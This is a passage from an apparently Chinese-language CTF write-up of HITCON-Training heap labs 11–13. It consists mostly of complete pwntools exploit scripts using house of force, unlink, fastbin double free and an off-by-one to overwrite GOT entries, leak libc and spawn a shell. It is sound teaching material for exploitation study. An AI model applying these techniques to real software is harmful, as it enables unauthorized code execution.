class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;2&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">length</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="k">def</span> <span class="nf">change</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">length</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">length</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="k">def</span> <span class="nf">exit</span><span class="p">():</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;5&#34;</span><span class="p">)</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">add</span><span class="p">(</span><span class="mh">0x60</span><span class="p">,</span> <span class="n">cyclic</span><span class="p">(</span><span class="mh">0x60</span><span class="p">))</span> <span class="c1"># DEBUG()</span> <span class="n">change</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x60</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">,</span> <span class="n">cyclic</span><span class="p">(</span><span class="mh">0x60</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">l64</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">))</span> <span class="n">add</span><span class="p">(</span><span class="o">-</span><span class="p">(</span><span class="mh">0x60</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="mh">0x10</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x10</span><span class="p">,</span> <span class="s1">&#39;aaaa&#39;</span><span class="p">)</span> <span class="c1"># -(sizeof(item)) - sizeof(box) - 0x10</span> <span class="n">add</span><span class="p">(</span><span class="mh">0x10</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./bamboobox&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;magic&#39;</span><span class="p">])</span> <span class="o">*</span> <span class="mi">2</span><span class="p">)</span> <span class="nb">exit</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><blockquote> <p>快速确定需要 malloc 的大数/负数可以使用 Pwngdb 的 force 功能, 这里我做了一个 <a href="https://github.com/0x01f/Pwngdb">fork</a>, 把 Pwngdb 和 pwndbg 的功能做了一个合并</p> </blockquote> <h4 id="unlink">unlink</h4> <p>至于 unlink，在这个 <a href="https://github.com/M4xW4n9/slides/blob/master/pwn_heap/malloc-150821074656-lva1-app6891.pdf">slide</a> 中有较大篇幅的介绍，就不在说明原理了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab11</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">unlink</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">time</span> <span class="kn">import</span> <span class="n">sleep</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./bamboobox&#34;</span><span class="p">)</span> <span class="c1"># process(&#34;./bamboobox&#34;).libc will assign libc.address but ELF(&#34;./bamboobox&#34;) won&#39;t</span> <span class="c1"># libc = io.libc</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./bamboobox&#34;</span><span class="p">)</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">libc</span> <span class="k">def</span> <span class="nf">DEBUG</span><span class="p">():</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span> <span class="k">def</span> <span class="nf">show</span><span class="p">():</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">length</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;2&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">length</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="k">def</span> <span class="nf">change</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">length</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">length</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="k">def</span> <span class="nf">remove</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;4&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">def</span> <span class="nf">exit</span><span class="p">():</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;5&#34;</span><span class="p">)</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">add</span><span class="p">(</span><span class="mh">0x40</span><span class="p">,</span> <span class="s1">&#39;0&#39;</span> <span class="o">*</span> <span class="mi">8</span><span class="p">)</span> <span class="n">add</span><span class="p">(</span><span class="mh">0x80</span><span class="p">,</span> <span class="s1">&#39;1&#39;</span> <span class="o">*</span> <span class="mi">8</span><span class="p">)</span> <span class="n">add</span><span class="p">(</span><span class="mh">0x40</span><span class="p">,</span> <span class="s1">&#39;2&#39;</span> <span class="o">*</span> <span class="mi">8</span><span class="p">)</span> <span class="n">ptr</span> <span class="o">=</span> <span class="mh">0x6020c8</span> <span class="n">fakeChunk</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="n">ptr</span> <span class="o">-</span> <span class="mh">0x18</span><span class="p">,</span> <span class="n">ptr</span> <span class="o">-</span> <span class="mh">0x10</span><span class="p">,</span> <span class="n">cyclic</span><span class="p">(</span><span class="mh">0x20</span><span class="p">),</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">])</span> <span class="n">change</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x80</span><span class="p">,</span> <span class="n">fakeChunk</span><span class="p">)</span> <span class="n">remove</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;atoi&#39;</span><span class="p">]])</span> <span class="n">change</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x80</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">show</span><span class="p">()</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\x7f</span><span class="s2">&#34;</span><span class="p">)[</span><span class="o">-</span><span class="mi">6</span><span class="p">:</span> <span class="p">]</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;atoi&#39;</span><span class="p">]</span> <span class="n">success</span><span class="p">(</span><span class="s2">&#34;libc.address -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">address</span><span class="p">))</span> <span class="c1"># libcBase = u64(io.recvuntil(&#34;\x7f&#34;)[-6: ].ljust(8, &#39;\x00&#39;)) - libc.sym[&#39;atoi&#39;]</span> <span class="c1"># success(&#34;libcBase -&gt; {:#x}&#34;.format(libcBase))</span> <span class="n">pause</span><span class="p">()</span> <span class="n">change</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x8</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">]))</span> <span class="c1"># change(0, 0x8, p64(libcBase + libc.sym[&#39;system&#39;]))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s1">&#39;$0&#39;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><p>可以看出，通过 house of house 直接控制函数指针进而控制 ip 的方法代码量少了不少，这也提醒我们不要放弃利用任何一个函数指针的机会</p> <h3 id="lab12-secretgarden">lab12-secretgarden</h3> <p>通过 double free 实现 fastbin attack 的题目，所谓 double free，指的就是对同一个 allocated chunk free 两次，这样就可以形成一个类似 <strong>0 -&gt; 1 -&gt; 0</strong> 的 cycled fastbin list，这样当我们 malloc 出 0 时，就可以修改 fastbin list 中 0 的 fd，如 <strong>1 -&gt; 0 -&gt; target</strong>，这样只要我们再 malloc 三次，并通过 malloc 的检查，就可以实现 malloc 到任何地址，进而实现任意地址写，至于 double free 的检查怎么绕过可以看这个 <a href="https://github.com/M4xW4n9/slides/blob/master/pwn_heap/advanceheap-160113090848.pdf">slide</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="k">def</span> <span class="nf">DEBUG</span><span class="p">():</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">,</span> <span class="s2">&#34;b *0x4009F2&#34;</span><span class="p">)</span> <span class="k">def</span> <span class="nf">Raise</span><span class="p">(</span><span class="n">length</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">length</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="s2">&#34;nb&#34;</span><span class="p">)</span> <span class="k">def</span> <span class="nf">remove</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="c1"># io = process(&#34;./secretgarden&#34;, {&#34;LD_PRELOAD&#34;: &#34;./libc-2.23.so&#34;})</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./secretgarden&#34;</span><span class="p">)</span> <span class="n">Raise</span><span class="p">(</span><span class="mh">0x50</span><span class="p">,</span> <span class="s2">&#34;000&#34;</span><span class="p">)</span> <span class="c1"># 0</span> <span class="n">Raise</span><span class="p">(</span><span class="mh">0x50</span><span class="p">,</span> <span class="s2">&#34;111&#34;</span><span class="p">)</span> <span class="c1"># 1</span> <span class="n">remove</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># 0</span> <span class="c1"># pause()</span> <span class="n">remove</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># 1 -&gt; 0</span> <span class="n">remove</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># 0 -&gt; 1 -&gt; 0</span> <span class="n">magic</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./secretgarden&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s2">&#34;magic&#34;</span><span class="p">]</span> <span class="c1"># fakeChunk = 0x602028 + 2 - 8</span> <span class="n">fakeChunk</span> <span class="o">=</span> <span class="mh">0x602000</span><span class="o">+</span><span class="mi">2</span><span class="o">-</span><span class="mi">8</span> <span class="n">Raise</span><span class="p">(</span><span class="mh">0x50</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">fakeChunk</span><span class="p">))</span> <span class="c1"># 0</span> <span class="n">Raise</span><span class="p">(</span><span class="mh">0x50</span><span class="p">,</span> <span class="s2">&#34;111&#34;</span><span class="p">)</span> <span class="c1"># 1</span> <span class="n">Raise</span><span class="p">(</span><span class="mh">0x50</span><span class="p">,</span> <span class="s2">&#34;000&#34;</span><span class="p">)</span> <span class="c1"># DEBUG()</span> <span class="c1"># payload = cyclic(8 - 2) + p64(magic) * 8</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">cyclic</span><span class="p">(</span><span class="mi">8</span> <span class="o">+</span> <span class="mi">8</span> <span class="o">-</span> <span class="mi">2</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">magic</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span> <span class="n">Raise</span><span class="p">(</span><span class="mh">0x50</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><ul> <li>以上的 exp 实现了通过 fastbin attack 来修改 got, 实际上通过 fastbin attack 来修改 __malloc_hook, __realloc_hook, __free_hook, IO_file_plus 结构体中的 jump_table 也是很常见的做法, 尤其是程序开了 Full Relro 保护时</li> <li>pwnable.tw 的 Secret Garden 一题就用到了以上几种做法, 可以参考这篇 <a href="http://tacxingxing.com/2018/02/20/pwnabletw-secretgarden/">writeup</a></li> <li>参考了 <a href="https://veritas501.space/2018/03/27/%E8%B0%83%E6%95%99pwndbg/">veritas501</a> 师傅的文章, 我在我的 <a href="https://github.com/0x01f/Pwngdb">fork</a> 里也加入了快速利用 fastbin attack 的函数 fake_fastbin_all</li> </ul> <h3 id="lab13-heapcreator">lab13-heapcreator</h3> <p>在 edit_heap 中有一个故意留下来的 off-by-one，并且不是 off-by-one null byte，因此我们就可以有很大自由度地控制下一个 chunk 的 size, 可以使用 extended chunk 这种技巧造成 overlapping chunk，进而通过将 *content 覆写为某函数的 got (如 free/atoi) 就可以 leak 出 libc 的地址，然后再改写为 system 的地址，控制参数即可 get shell</p> <p>关于 extended chunk 的介绍可以看这个 <strong><a href="https://github.com/M4xW4n9/slides/blob/master/pwn_heap/advanceheap-160113090848.pdf">slide</a></strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab13</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="k">def</span> <span class="nf">create</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span> <span class="k">def</span> <span class="nf">edit</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="s2">&#34;2&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span> <span class="k">def</span> <span class="nf">show</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">def</span> <span class="nf">delete</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="s2">&#34;4&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./heapcreator&#34;</span><span class="p">,</span> <span class="p">{</span><span class="s2">&#34;LD_LOADPRE&#34;</span><span class="p">:</span> <span class="s2">&#34;/lib/x86_64-linux-gnu/libc.so.6&#34;</span><span class="p">})</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;/lib/x86_64-linux-gnu/libc.so.6&#34;</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="mh">0x18</span><span class="p">,</span> <span class="s1">&#39;0000&#39;</span><span class="p">)</span> <span class="c1"># 0</span> <span class="n">create</span><span class="p">(</span><span class="mh">0x10</span><span class="p">,</span> <span class="s1">&#39;1111&#39;</span><span class="p">)</span> <span class="c1"># 1</span> <span class="n">payload</span> <span class="o">=</span> <span class="s2">&#34;/bin/sh</span><span class="se">\0</span><span class="s2">&#34;</span> <span class="o">+</span> <span class="n">cyclic</span><span class="p">(</span><span class="mh">0x10</span><span class="p">)</span> <span class="o">+</span> <span class="n">p8</span><span class="p">(</span><span class="mh">0x41</span><span class="p">)</span> <span class="n">edit</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="c1"># overwrite 1</span> <span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># overlapping chunk</span> <span class="n">freeGot</span> <span class="o">=</span> <span class="mh">0x0000000000602018</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x30</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">freeGot</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="mh">0x30</span><span class="p">,</span> <span 